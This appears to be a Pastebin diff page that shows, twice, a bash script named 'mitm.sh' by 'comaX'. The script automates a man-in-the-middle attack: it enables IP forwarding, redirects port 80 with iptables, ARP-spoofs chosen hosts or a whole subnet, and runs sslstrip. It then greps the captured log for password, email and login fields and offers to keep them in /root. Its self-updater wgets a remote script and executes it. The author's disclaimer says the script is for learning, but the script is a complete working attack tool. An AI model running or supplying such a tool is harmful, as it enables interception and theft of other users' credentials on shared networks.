View difference between Paste ID: <a href="/NM4T4H6b">NM4T4H6b</a> and <a href="/post/view"></a>

View difference between Paste ID: NM4T4H6b and

SHOW: | | - or go back to the newest paste.


#!/bin/bash
# Little bash script to launch man it the middle attack and sslstrip.
# version 0.6 by comaX 
PROGNAME=$(basename $0)
VERSION="0.6.2"
#Let's define some arguments that can be passed to the script :
args=
while [ $# -ge 1 ] #check parameters
do
  case $1 in
 	-h | --help) #define help message
clear 
echo -e "You are running $0, version $VERSION.

usage : $0 [-h | --help] | [-u | --upadte]
	-h or --help : displays this help message, disclaimer and exit.
	-u or --update updates and installs this script

\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking 
and wouldn't be held responsible for you actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credential and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you very basic shell script
programming.

\033[31m Changelog :\033[m
added in v0.6
-Support for multiple targets

added in v0.5 :
-Parameters for this great help message and update, more comments.
-Minor improvments

added in v0.4 :
-User friendly case insensitive answers (Y/y)
-Option to map network, retrieving live hosts and their dns names
-Minor improvments

\033[31m Credits :\033[m
Credits goes to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.

Please criticize this program or submit ideas on the official thread at
http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
exit ;;
	-u | --update) #update program
		echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)"
		read -e proceed
		if [[ $proceed = "y" || $proceed = "Y" ]] ; then
		wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file
		cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin
		rm /tmp/mitm_update.sh #delete temp file
		echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
		sleep 3
		chmod +x /usr/bin/mitm #make newly installed script executable
		/usr/bin/mitm #launch new script
		else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2		
		fi ;;
	*) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;;
  esac
  shift
done

clear
echo -e	"===========================================================================
=\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m =
=   Feel free to contribute, and distribute this script as you please.    =
=		Official thread : http://tiny.cc/mitmautomate		  =
=	Check out the help (-h) to see new features and informations  	  =
= 		    You are running version $VERSION.			  =
==========================================================================="
echo
echo
# Starting fresh : reset ip forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "[-] Cleaned."
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

# Defining exit function and other ending features

cleanup() {
echo
echo "[+] Killing processes and resetting iptable."

kill ${sslstripid}
killall arpspoof
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush 			# there are probably too many resets here,
iptables --table nat --flush		# but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results
echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found
echo
echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
echo "If you want to keep it, it will be stored in /root/$filename.txt"
read -e keep
	if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
	mv /tmp/$filename.txt /root/$filename.txt #moving file
		if [ -f "/root/$filename.txt" ]; then #check if it exists
		echo "Log file copied !" #it does
		else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
		fi
	else rm /tmp/$filename.txt #removing temp file 
	echo "All logs deleted"
fi
if [ -f "/usr/bin/mitm" ]; then #check if script is already installed
	echo
	echo
	exit 1 #if yes, exit.
	else 
	echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
	read -e install
		if [[ $install = "Y" || $install="y" ]] ; then
		cp ./mitm.sh /usr/bin/mitm #copy and rename script
		echo -e "\033[32m Script installed !\033[m"
		else echo "Script not installed."
		fi
	fi

exit
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m [+] Activating ip forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
echo
read -e outport
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)"
echo
read -e inport
echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Arpspoofing
echo
echo -e "\033[31m [+] Activating arpspoofing... \033[m"
echo
ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need.
echo
echo "Enter gateway ip adress (as shown above) :"
read -e gateway
echo
echo "What interface would you like to use ? (it should match gateway ip as shown above)"
read -e iface
echo
echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
read -e choicearp
echo

if [[ $choicearp = "N" || $choicearp = "n" ]] ; then
echo
echo -e "Do you want to map network to show live hosts ? (Y/N)	[This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
	if [[ $hosts = "Y" || $hosts = "y" ]] ; then
	fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
	grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
	rm /tmp/hosts.txt # remove temporary file
	echo -e "\033[m " # switch color back to white
	else echo -e "\033[m "
fi
echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m "
arpspoofi() {
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
	
if [[ "$2" > "0" ]] ; then
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2
		else echo
	fi	
if [[ "$3" > "0" ]] ; then
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2
		else echo
	fi
if [[ "$4" > "0" ]] ; then 
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2
	else echo
	fi
if [[ "$5" > "0" ]] ; then 
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2
	else echo
	fi
if [[ "$6" > "0" ]] ; then 
	xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2
else echo
	fi
t1=$1
t2=$2
t3=$3
t4=$4
t5=$5
t6=$6

}
echo "Enter ip adresses"
read -e parameters
arpspoofi $parameters
echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"

elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then
xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$!
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"

else echo "Your choice is invalid. Quitting."
cleanup
fi


#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo  "Choose filename to output :"
read -e filename
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
echo
echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ?
echo
echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
echo
echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
echo
read quitting
if [ $quitting = "quit" ] ; then

cleanup
else echo "Bad choice. Enter quit to stop attack"
read -e quitting
if [ $quitting = "quit" ] ; then
cleanup

else echo "Bad choice. Enter quit to stop attack"
read -e quitting
if [ $quitting = "quit" ] ; then
cleanup

else echo "Bad choice. Enter quit to stop attack"
read -e quitting
if [ $quitting = "quit" ] ; then
cleanup

else echo "Bad choice. Enter quit to stop attack"
echo
echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
cleanup
fi
fi
fi
fi

1	-
1	+	#!/bin/bash
2		# Little bash script to launch man it the middle attack and sslstrip.
3		# version 0.6 by comaX
4		PROGNAME=$(basename $0)
5		VERSION="0.6.2"
6		#Let's define some arguments that can be passed to the script :
7		args=
8		while [ $# -ge 1 ] #check parameters
9		do
10		case $1 in
11		-h \| --help) #define help message
12		clear
13		echo -e "You are running $0, version $VERSION.
14
15		usage : $0 [-h \| --help] \| [-u \| --upadte]
16		-h or --help : displays this help message, disclaimer and exit.
17		-u or --update updates and installs this script
18
19		\033[31m DISCLAIMER :\033[m
20		This program is intended for learning purpose only. I do not condone hacking
21		and wouldn't be held responsible for you actions. Only you would face legal
22		consequences if you used this script for illegal activities.
23
24		\033[31m What I think should be learnt from this script :\033[m
25		This script should teach you how easy it is to steal sensitive online
26		credential and how to protect you from it, provided you understand
27		what this program does. The best way to understand what it does is
28		to look at its source. This will also teach you very basic shell script
29		programming.
30
31		\033[31m Changelog :\033[m
32		added in v0.6
33		-Support for multiple targets
34
35		added in v0.5 :
36		-Parameters for this great help message and update, more comments.
37		-Minor improvments
38
39		added in v0.4 :
40		-User friendly case insensitive answers (Y/y)
41		-Option to map network, retrieving live hosts and their dns names
42		-Minor improvments
43
44		\033[31m Credits :\033[m
45		Credits goes to all people on backtrack forums for their help and support,
46		and google for being my best friend with scripting.
47
48		Please criticize this program or submit ideas on the official thread at
49		http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
50		exit ;;
51		-u \| --update) #update program
52		echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)"
53		read -e proceed
54		if [[ $proceed = "y" \|\| $proceed = "Y" ]] ; then
55		wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file
56		cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin
57		rm /tmp/mitm_update.sh #delete temp file
58		echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
59		sleep 3
60		chmod +x /usr/bin/mitm #make newly installed script executable
61		/usr/bin/mitm #launch new script
62		else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2
63		fi ;;
64		*) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;;
65		esac
66		shift
67		done
68
69		clear
70		echo -e "===========================================================================
71		=\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m =
72		= Feel free to contribute, and distribute this script as you please. =
73		= Official thread : http://tiny.cc/mitmautomate =
74		= Check out the help (-h) to see new features and informations =
75		= You are running version $VERSION. =
76		==========================================================================="
77		echo
78		echo
79		# Starting fresh : reset ip forward and iptables
80		echo -e "\033[31m [+] Cleaning iptables \033[m"
81		echo "[-] Cleaned."
82		echo "0" > /proc/sys/net/ipv4/ip_forward
83		iptables --flush
84		iptables --table nat --flush
85		iptables --delete-chain
86		iptables --table nat --delete-chain
87
88		# Defining exit function and other ending features
89
90		cleanup() {
91		echo
92		echo "[+] Killing processes and resetting iptable."
93
94		kill ${sslstripid}
95		killall arpspoof
96		echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
97		iptables --flush # there are probably too many resets here,
98		iptables --table nat --flush # but at least we're sure everything's clean
99		iptables --delete-chain
100		iptables --table nat --delete-chain
101
102		echo "[+] Clean up successful..."
103		echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results
104		echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
105		egrep --color -i "&pwd=\|&pass=\|&passwd=\|&password=\|&textbox=\|&email=\|&user=\|&login=" /tmp/$filename.txt #colorize all search terms when found
106		echo
107		echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
108		echo "If you want to keep it, it will be stored in /root/$filename.txt"
109		read -e keep
110		if [[ $keep = "Y" \|\| $keep = "y" ]] ; then # double brackets because double condition. \|\| signifies "or"
111		mv /tmp/$filename.txt /root/$filename.txt #moving file
112		if [ -f "/root/$filename.txt" ]; then #check if it exists
113		echo "Log file copied !" #it does
114		else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
115		fi
116		else rm /tmp/$filename.txt #removing temp file
117		echo "All logs deleted"
118		fi
119		if [ -f "/usr/bin/mitm" ]; then #check if script is already installed
120		echo
121		echo
122		exit 1 #if yes, exit.
123		else
124		echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
125		read -e install
126		if [[ $install = "Y" \|\| $install="y" ]] ; then
127		cp ./mitm.sh /usr/bin/mitm #copy and rename script
128		echo -e "\033[32m Script installed !\033[m"
129		else echo "Script not installed."
130		fi
131		fi
132
133		exit
134		}
135		###############################End of functions#############################
136		# IP forwarding
137		echo
138		echo -e "\033[31m [+] Activating ip forwarding... \033[m"
139		echo "1" > /proc/sys/net/ipv4/ip_forward
140		echo "[-] Activated."
141
142		#Iptables
143		echo
144		echo -e "\033[31m [+] Configuring iptables... \033[m"
145		echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
146		echo
147		read -e outport
148		echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)"
149		echo
150		read -e inport
151		echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
152		iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
153		echo "[-] Traffic rerouted"
154
155		#Arpspoofing
156		echo
157		echo -e "\033[31m [+] Activating arpspoofing... \033[m"
158		echo
159		ip route show \| grep ^default #ip route show, minimized to line begining with "default" : this is the one we need.
160		echo
161		echo "Enter gateway ip adress (as shown above) :"
162		read -e gateway
163		echo
164		echo "What interface would you like to use ? (it should match gateway ip as shown above)"
165		read -e iface
166		echo
167		echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
168		read -e choicearp
169		echo
170
171		if [[ $choicearp = "N" \|\| $choicearp = "n" ]] ; then
172		echo
173		echo -e "Do you want to map network to show live hosts ? (Y/N) [This might take up to 30 secs, be patient]"
174		read -e hosts
175		echo -e "\033[31m "
176		if [[ $hosts = "Y" \|\| $hosts = "y" ]] ; then
177		fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
178		grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
179		rm /tmp/hosts.txt # remove temporary file
180		echo -e "\033[m " # switch color back to white
181		else echo -e "\033[m "
182		fi
183		echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m "
184		arpspoofi() {
185		xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
186
187		if [[ "$2" > "0" ]] ; then
188		xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2
189		else echo
190		fi
191		if [[ "$3" > "0" ]] ; then
192		xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2
193		else echo
194		fi
195		if [[ "$4" > "0" ]] ; then
196		xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2
197		else echo
198		fi
199		if [[ "$5" > "0" ]] ; then
200		xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2
201		else echo
202		fi
203		if [[ "$6" > "0" ]] ; then
204		xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2
205		else echo
206		fi
207		t1=$1
208		t2=$2
209		t3=$3
210		t4=$4
211		t5=$5
212		t6=$6
213
214		}
215		echo "Enter ip adresses"
216		read -e parameters
217		arpspoofi $parameters
218		echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
219		echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"
220
221		elif [[ $choicearp = "Y" \|\| $choicearp = "y" ]] ; then
222		xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$!
223		sleep 2
224		echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
225		echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"
226
227		else echo "Your choice is invalid. Quitting."
228		cleanup
229		fi
230
231
232		#Sslstrip
233		echo
234		echo -e "\033[31m [+] Activating sslstrip... \033[m"
235		echo "Choose filename to output :"
236		read -e filename
237		sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
238		sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
239		echo
240		echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
241		echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ?
242		echo
243		echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
244		echo
245		echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
246		echo
247		read quitting
248		if [ $quitting = "quit" ] ; then
249
250		cleanup
251		else echo "Bad choice. Enter quit to stop attack"
252		read -e quitting
253		if [ $quitting = "quit" ] ; then
254		cleanup
255
256		else echo "Bad choice. Enter quit to stop attack"
257		read -e quitting
258		if [ $quitting = "quit" ] ; then
259		cleanup
260
261		else echo "Bad choice. Enter quit to stop attack"
262		read -e quitting
263		if [ $quitting = "quit" ] ; then
264		cleanup
265
266		else echo "Bad choice. Enter quit to stop attack"
267		echo
268		echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
269		cleanup
270		fi
271		fi
272		fi
273		fi